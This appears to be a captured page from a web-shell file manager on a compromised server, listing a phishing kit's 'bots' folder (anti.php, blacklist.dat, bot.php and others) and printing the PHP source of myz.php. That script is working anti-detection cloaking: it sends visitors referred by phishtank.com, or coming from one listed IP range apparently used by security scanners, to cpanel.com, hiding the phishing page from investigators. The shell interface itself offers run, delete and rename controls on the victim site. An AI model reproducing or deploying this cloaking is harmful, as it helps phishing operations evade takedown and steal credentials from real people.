at path:
ROOT
/
att
/
bots
/
xbots
/
myz.php
run:
R
W
Run
anti.php
0 By
2022-01-02 07:21:24
R
W
Run
Delete
Rename
blacklist.dat
30.08 KB
2019-09-27 11:31:38
R
W
Run
Delete
Rename
bot.php
36.88 KB
2021-03-01 17:49:54
R
W
Run
Delete
Rename
cb70.ini
71 By
2021-12-24 03:29:04
R
W
Run
Delete
Rename
crawler.php
924 By
2021-04-02 02:07:36
R
W
Run
Delete
Rename
index.php
2 By
2021-11-29 11:37:10
R
W
Run
Delete
Rename
myz.php
739 By
2021-04-02 02:08:48
R
W
Run
Delete
Rename
yeahbb.php
2.41 KB
2021-12-25 22:28:20
R
W
Run
Delete
Rename
error_log
up
📄
myz.php
Save
<?php if(isset($_SERVER['HTTP_REFERER'])) { if(parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST) == 'phishtank.com') { header("Location: https://www.cpanel.com"); die(); } } if(isset($_SERVER['HTTP_REFERER'])) { if(parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST) == 'www.phishtank.com') { header("Location: https://www.cpanel.com"); die(); } } ### Check if the ip between 146.112.0.0 And 146.112.255.255 ### $range_start = ip2long("146.112.0.0"); $range_end = ip2long("146.112.255.255"); $ip2long = ip2long($_SERVER['REMOTE_ADDR']); if ($ip2long >= $range_start && $ip2long <= $range_end){ header("Location: https://www.cpanel.com"); die(); } ?>